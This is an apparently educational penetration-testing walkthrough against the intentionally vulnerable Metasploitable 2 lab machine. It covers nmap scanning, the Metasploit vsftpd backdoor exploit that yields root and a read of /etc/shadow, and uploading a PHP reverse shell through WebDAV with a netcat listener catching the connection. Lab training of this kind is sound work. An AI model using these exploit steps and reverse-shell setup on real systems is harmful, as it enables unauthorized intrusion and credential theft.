Metasploitable

The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed
for testing security tools and demonstrating common vulnerabilities. Version 2 of this virtual
machine is available for download and ships with even more vulnerabilities than the original image.
This virtual machine is compatible with VMWare, VirtualBox, and other common virtualization
platforms. By default, Metasploitable’s network interfaces should never be exposed to a hostile
network.

This VM can be used to conduct security training, test security tools, and practice common
penetration testing techniques.

1. Installation and configuration

We are here to exploit Metasploitable 2 (Damn vulnerable machine for penetration testing)

Installation Process:

1. Open VirtualBox and Click on “New” button to create a new virtual machine

2. Type the Virtual Machine name(Metasploitable2)

3. Allocate the amount of memory(Preferable but not below 512mb)

4. Select Use an existing hard disk file

5. Select the vmdk file that you have downloaded from Rapid7

6. Click on Create…!!! Successfully Installed Metasploitable2, Now it’s time to configure

network settings.

After installation change the network adapter settings as follows :

In-Network Setting: Settings/Network/Adapter Select Ethernet or Wireless

In Advanced tab Select: Promiscuous Mode as Allow All

Bootup the Metasploitable2 machine and Try to login using given credentials on Banner…!!!
Find machine IP address by using the following command in terminal

ifconfig

That’s All for setup….Let’s Start Hacking…

 2. Walkthrough
NMAP Scanning
Scanning the Matasploitable 2

What is Nmap?

Nmap, short for Network Mapper, is a network discovery and security auditing tool. It is known for
its simple and easy to remember flags that provide powerful scanning options. Nmap is widely used
by network administrators to scan for:

• Open ports and services

• Discover services along with their versions

• Guess the operating system running on a target machine

• Get accurate packet routes till the target machine

• Monitoring hosts

As we noticed the IP address of the machine is 192.168.0.130

Let’s begin scanning with Nmap which is part of Kali Linux

Example 1

nmap -sV -p- 192.168.0.130

Example 2

A preliminary nmap scan reveals services

root@kali:~# nmap -sV -O 192.168.0.130 -p1-65535

Starting Nmap 6.47 ( http://nmap.org ) at 2015-06-14 17:35 MDT

Nmap scan report for 192.168.0.14

Host is up (0.00051s latency).

Not shown: 65505 closed ports

PORT STATE SERVICE VERSION

21/tcp open ftp vsftpd 2.3.4

22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)

23/tcp open telnet Linux telnetd

25/tcp open smtp Postfix smtpd

53/tcp open domain ISC BIND 9.4.2

80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)

111/tcp open rpcbind 2 (RPC #100000)

139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)

445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)

512/tcp open exec netkit-rsh rexecd

513/tcp open login?

514/tcp open tcpwrapped

1099/tcp open rmiregistry GNU Classpath grmiregistry

1524/tcp open shell Metasploitable root shell

2049/tcp open nfs 2-4 (RPC #100003)

2121/tcp open ftp ProFTPD 1.3.1

3306/tcp open mysql MySQL 5.0.51a-3ubuntu5

3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))

5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7

5900/tcp open vnc VNC (protocol 3.3)

6000/tcp open X11 (access denied)

6667/tcp open irc Unreal ircd

6697/tcp open irc Unreal ircd

8009/tcp open ajp13 Apache Jserv (Protocol v1.3)

8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1

8787/tcp open drb Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)

32907/tcp open unknown

40627/tcp open status 1 (RPC #100024)

41759/tcp open nlockmgr 1-4 (RPC #100021)

57859/tcp open mountd 1-3 (RPC #100005)

MAC Address: 08:00:27:E9:91:67 (Cadmus Computer Systems)

Device type: general purpose

Running: Linux 2.6.X

OS CPE: cpe:/o:linux:linux_kernel:2.6

OS details: Linux 2.6.9 - 2.6.33

Network Distance: 1 hop

Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux;

CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/
.

Nmap done: 1 IP address (1 host up) scanned in 172.46 seconds

Example 3

Open a Terminal window on your Backtrack system and type:

nmap -v -A 192.168.0.130

This will show us the open ports and try to enumerate what services are running. Here is a look at
the ports:
 3. VSFTPD Exploitation Port 21
At command prompt type msfconsole

Metasploit will start up

Msf5 > search vsftpd

use exploit/unix/ftp/vsftpd_234_backdoor

show options

set RHOSTS 192.168.0.130

exploit or run

Type whoami

root

You now have root access

Checking privileges

Type Id

uid=0(root) gid=0(root)

Reading the “/etc/shadow”

cat /etc/shadow
 4. Exploit WebDAV on a Server & Get a Shell

Step 1

Check if WebDAV Is Enabled

The first thing we need to do is check if WebDAV is enabled on the target. Metasploit has a scanner
we can use to do so, so fire it up by typing msfconsole in the terminal. Then, we can locate the
module using the search command:

msf5 > search webdav

Matching Modules

================

# Name Disclosure Date Rank Check Description

- ---- --------------- ---- ----- -----------

0 auxiliary/scanner/http/dir_webdav_unicode_bypass normal Yes MS09-020 IIS6 WebDAV Unicode

Auth Bypass Directory Scanner

1 auxiliary/scanner/http/ms09_020_webdav_unicode_bypass normal Yes MS09-020 IIS6 WebDAV

Unicode Authentication Bypass

2 auxiliary/scanner/http/webdav_internal_ip normal Yes HTTP WebDAV Internal IP Scanner

3 auxiliary/scanner/http/webdav_scanner normal Yes HTTP WebDAV Scanner

4 auxiliary/scanner/http/webdav_website_content normal Yes HTTP WebDAV Website Content

Scanner

5 exploit/multi/http/sun_jsws_dav_options 2010-01-20 great Yes Sun Java System Web Server

WebDAV OPTIONS Buffer Overflow

6 exploit/multi/svn/svnserve_date 2004-05-19 average No Subversion Date Svnserve

7 exploit/osx/browser/safari_file_policy 2011-10-12 normal No Apple Safari file:// Arbitrary Code

Execution

8 exploit/windows/browser/java_ws_arginject_altjvm 2010-04-09 excellent No Sun Java Web Start Plugin

Command Line Argument Injection

9 exploit/windows/browser/java_ws_double_quote 2012-10-16 excellent No Sun Java Web Start Double

Quote Injection

10 exploit/windows/browser/java_ws_vmargs 2012-02-14 excellent No Sun Java Web Start Plugin

Command Line Argument Injection

11 exploit/windows/browser/keyhelp_launchtripane_exec 2012-06-26 excellent No KeyHelp ActiveX

LaunchTriPane Remote Code Execution Vulnerability

12 exploit/windows/browser/ms07_017_ani_loadimage_chunksize 2007-03-28 great No Windows ANI

LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)

13 exploit/windows/browser/ms10_022_ie_vbscript_winhlp32 2010-02-26 great No MS10-022 Microsoft

Internet Explorer Winhlp32.exe MsgBox Code Execution
 14 exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec 2010-06-09 excellent No Microsoft Help Center
XSS and Command Execution

15 exploit/windows/browser/ms10_046_shortcut_icon_dllloader 2010-07-16 excellent No Microsoft Windows

Shell LNK Code Execution

16 exploit/windows/browser/oracle_webcenter_checkoutandopen 2013-04-16 excellent No Oracle WebCenter

Content CheckOutAndOpen.dll ActiveX Remote Code Execution

17 exploit/windows/browser/ubisoft_uplay_cmd_exec 2012-07-29 normal No Ubisoft uplay 2.0.3 ActiveX

Control Arbitrary Code Execution

18 exploit/windows/browser/webdav_dll_hijacker 2010-08-18 manual No WebDAV Application DLL

Hijacker

19 exploit/windows/http/sap_host_control_cmd_exec 2012-08-14 average Yes SAP NetWeaver HostControl

Command Injection

20 exploit/windows/http/xampp_webdav_upload_php 2012-01-14 excellent No XAMPP WebDAV PHP

Upload

21 exploit/windows/iis/iis_webdav_scstoragepathfromurl 2017-03-26 manual Yes Microsoft IIS WebDav

ScStoragePathFromUrl Overflow

22 exploit/windows/iis/iis_webdav_upload_asp 2004-12-31 excellent No Microsoft IIS WebDAV Write

Access Code Execution

23 exploit/windows/iis/ms03_007_ntdll_webdav 2003-05-30 great Yes MS03-007 Microsoft IIS 5.0

WebDAV ntdll.dll Path Overflow

24 exploit/windows/local/ms16_016_webdav 2016-02-09 excellent Yes MS16-016 mrxdav.sys WebDav

Local Privilege Escalation

25 exploit/windows/misc/ibm_director_cim_dllinject 2009-03-10 excellent Yes IBM System Director Agent DLL

Injection

26 exploit/windows/misc/vmhgfs_webdav_dll_sideload 2016-08-05 normal No DLL Side Loading

Vulnerability in VMware Host Guest Client Redirector

27 exploit/windows/misc/webdav_delivery 1999-01-01 manual No Serve DLL via webdav server

28 exploit/windows/scada/ge_proficy_cimplicity_gefebt 2014-01-23 excellent Yes GE Proficy CIMPLICITY

gefebt.exe Remote Code Execution

29 exploit/windows/ssl/ms04_011_pct 2004-04-13 average No MS04-011 Microsoft Private

Communications Transport Overflow

30 post/windows/escalate/droplnk normal No Windows Escalate SMB Icon LNK Dropper

We want the webdav_scanner module, so load it with the use command:

msf5 > use auxiliary/scanner/http/webdav_scanner

Now, we can take a look at the options for this module:

msf5 auxiliary(scanner/http/webdav_scanner) > options

Module options (auxiliary/scanner/http/webdav_scanner):
 Name Current Setting Required Description

---- --------------- -------- -----------

PATH / yes Path to use

Proxies no A proxy chain of format type:host:port[,type:host:port][...]

RHOSTS yes The target address range or CIDR identifier

RPORT 80 yes The target port (TCP)

SSL false no Negotiate SSL/TLS for outgoing connections

THREADS 1 yes The number of concurrent threads

VHOST no HTTP server virtual host

We now want to set the path to /dav/, a directory commonly used for WebDAV:

msf5 auxiliary(scanner/http/webdav_scanner) > set path /dav/

path => /dav/

Next, we can set rhosts to the IP address of our target:

msf5 auxiliary(scanner/http/webdav_scanner) > set rhosts 10.10.0.50

rhosts => 10.10.0.50

We should be good to go, so type run to launch the module:

msf5 auxiliary(scanner/http/webdav_scanner) > run

[+] 10.10.0.50 (Apache/2.2.8 (Ubuntu) DAV/2) has WEBDAV ENABLED

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

The scanner will return some HTTP information, including the Apache version number and whether
WebDAV is enabled or not. As we can see above, it is indeed enabled on our target.

Step 2

Test File Permissions with DAVTest

The next thing we'll want to do is test the permissions and file execution policies on the server.
Remember, our ultimate goal here is to obtain a reverse shell, so we need to know what we're
walking into.
DAVTest is a handy tool that will automatically test these things out for us. Simply type davtest in
the terminal to see the help and usage example:

~# davtest

ERROR: Missing -url

/usr/bin/davtest -url <url> [options]

-auth+ Authorization (user:password)

-cleanup delete everything uploaded when done

-directory+ postfix portion of directory to create

-debug+ DAV debug level 1-3 (2 & 3 log req/resp to /tmp/perldav_debug.txt)

-move PUT text files then MOVE to executable

-nocreate don't create a directory

-quiet only print out summary

-rand+ use this instead of a random string for filenames

-sendbd+ send backdoors:

auto - for any succeeded test

ext - extension matching file name(s) in backdoors/ dir

-uploadfile+ upload this file (requires -uploadloc)

-uploadloc+ upload file to this location/name (requires -uploadfile)

-url+ url of DAV location

Example: /usr/bin/davtest -url http://localhost/davdir

At the most basic level, all we need to do is provide it with a valid URL pointing to an instance of
WebDAV. Naturally, use the -url switch followed by the correct URL.

Here, we can see the tool work its magic. It begins by testing the connection and attempts to create
a test directory, which we see is a success. Next, DAVTest will send a variety of different types of files
to determine what can be uploaded. It looks like all of these succeed.

~# davtest -url http://10.10.0.50/dav

********************************************************

Testing DAV connection

OPEN SUCCEED: http://10.10.0.50/dav

********************************************************

NOTE Random string for this session: 6WDIVTY

********************************************************

Creating directory

MKCOL SUCCEED: Created http://10.10.0.50/dav/DavTestDir_6WDIVTY

********************************************************

Sending test files

PUT asp SUCCEED: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.asp

PUT txt SUCCEED: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.txt

PUT php SUCCEED: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.php

PUT jhtml SUCCEED: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.jhtml

PUT aspx SUCCEED: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.aspx

PUT cgi SUCCEED: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.cgi

PUT shtml SUCCEED: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.shtml

PUT cfm SUCCEED: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.cfm

PUT html SUCCEED: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.html

PUT jsp SUCCEED: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.jsp

PUT pl SUCCEED: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.pl

********************************************************

Checking for test file execution

EXEC asp FAIL

EXEC txt SUCCEED: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.txt

EXEC php SUCCEED: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.php

EXEC jhtml FAIL

EXEC aspx FAIL

EXEC cgi FAIL

EXEC shtml FAIL

EXEC cfm FAIL

EXEC html SUCCEED: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.html

EXEC jsp FAIL

EXEC pl FAIL

********************************************************

/usr/bin/davtest Summary:

Created: http://10.10.0.50/dav/DavTestDir_6WDIVTY
PUT File: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.asp

PUT File: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.txt

PUT File: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.php

PUT File: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.jhtml

PUT File: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.aspx

PUT File: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.cgi

PUT File: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.shtml

PUT File: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.cfm

PUT File: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.html

PUT File: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.jsp

PUT File: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.pl

Executes: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.txt

Executes: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.php

Executes: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.html

Toward the end of the output above, we see the good stuff: testing for file execution. We can see
that most of them fail, but TXT, HTML, and perhaps the most important for us, PHP files, will all
successfully execute. All we need to do now is find a way to upload our shell.

Step 3Upload the Shell Using Cadaver

For the final stage of our attack, we will use a tool called Cadaver, which offers an intuitive interface
for interacting with the WebDAV service — with FTP-like commands that are simple to use.

We can view the help and usage information by typing cadaver -h in the terminal:

~# cadaver -h
Usage: cadaver [OPTIONS] http://hostname[:port]/path

Port defaults to 80, path defaults to '/'

Options:

-t, --tolerant Allow cd/open into non-WebDAV enabled collection.

-r, --rcfile=FILE Read script from FILE instead of ~/.cadaverrc.

-p, --proxy=PROXY[:PORT] Use proxy host PROXY and optional proxy port PORT.

-V, --version Display version information.

-h, --help Display this help message.

Please send bug reports and feature requests to <cadaver@webdav.org>

Let's test it out with a harmless text file before we jump to uploading our shell. First, create a simple
text file:

root@drd:~# echo 'TESTING' > test.txt

Next, we can connect to WebDAV via Cadaver by supplying the appropriate URL:

~# cadaver http://10.10.0.50/dav

dav:/dav/>

To get a list of available commands, type ? or help at the prompt:

dav:/dav/> ?

Available commands:

ls cd pwd put get mget mput

edit less mkcol cat delete rmcol copy

move lock unlock discover steal showlocks version

checkin checkout uncheckout history label propnames chexec

propget propdel propset search set open close

echo quit unset lcd lls lpwd logout

help describe about

Aliases: rm=delete, mkdir=mkcol, mv=move, cp=copy, more=less, quit=exit=bye

We can use the put command to upload our test file:

dav:/dav/> put test.txt

Uploading test.txt to `/dav/test.txt':

Progress: [=============================>] 100.0% of 8 bytes succeeded.

Now, if we navigate to it in the browser, we should see the text displayed to us:

Since we are now confident that uploading will work, we can quit Cadaver for now so we can get our
shell ready:

dav:/dav/> quit
Connection to `10.10.0.50' closed.

Kali contains a variety of shells in the /usr/share/webshells/ directory. We want the PHP reverse
shell, so copy it to our current directory with the following command:

~# cp /usr/share/webshells/php/php-reverse-shell.php .

Next, we need to edit a couple of things, so open the file with your favorite text editor and change
the IP address to that of our local machine, as well as the port to a port of your choosing:
set_time_limit (0);

$VERSION = "1.0";

$ip = '10.10.0.1'; // CHANGE THIS

$port = 7777; // CHANGE THIS

$chunk_size = 1400;

$write_a = null;

$error_a = null;

$shell = 'uname -a; w; id; /bin/sh -i';

$daemon = 0;

$debug = 0;

Save the file, and set up a listener with Netcat to catch the incoming connection:

~# nc -lvnp 7777
listening on [any] 7777 ...

In a new window or tab, connect to WebDAV again and upload our shell just like we did earlier with
the test file:

~# cadaver http://10.10.0.50/dav

dav:/dav/> put php-reverse-shell.php

Uploading php-reverse-shell.php to `/dav/php-reverse-shell.php':

Progress: [=============================>] 100.0% of 5491 bytes succeeded.

Now browse to the file, and if it's successful, we should see the browser hang:
Back on our listener, we should see a connection open up from the target:
connect to [10.10.0.1] from (UNKNOWN) [10.10.0.50] 54183

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

14:41:17 up 1:01, 1 user, load average: 0.12, 0.08, 0.01

USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT

root pts/0 :0.0 13:41 1:00 0.05s 0.05s -bash

uid=33(www-data) gid=33(www-data) groups=33(www-data)

sh: no job control in this shell

sh-3.2$

We can now issue commands like whoami to confirm we have compromised the server:

sh-3.2$ whoami

www-data

Using cadaver tool to upload webshell

Achieving RCE on the webserver

From here, we would probably want to upgrade our shell and attempt to escalate privileges to root.

Wrapping Up

In this tutorial, we learned about WebDAV and how to exploit a misconfigured version of it to get
shell access. First, we used a Metasploit scanner to determine if WebDAV was running on the target.
Next, we were able to test file execution policies with a tool called DAVTest. Finally, we utilized
Cadaver to upload a reverse shell and compromise the server. While remote access offers a
convenient way to collaborate, hackers will always try to exploit it for their own use.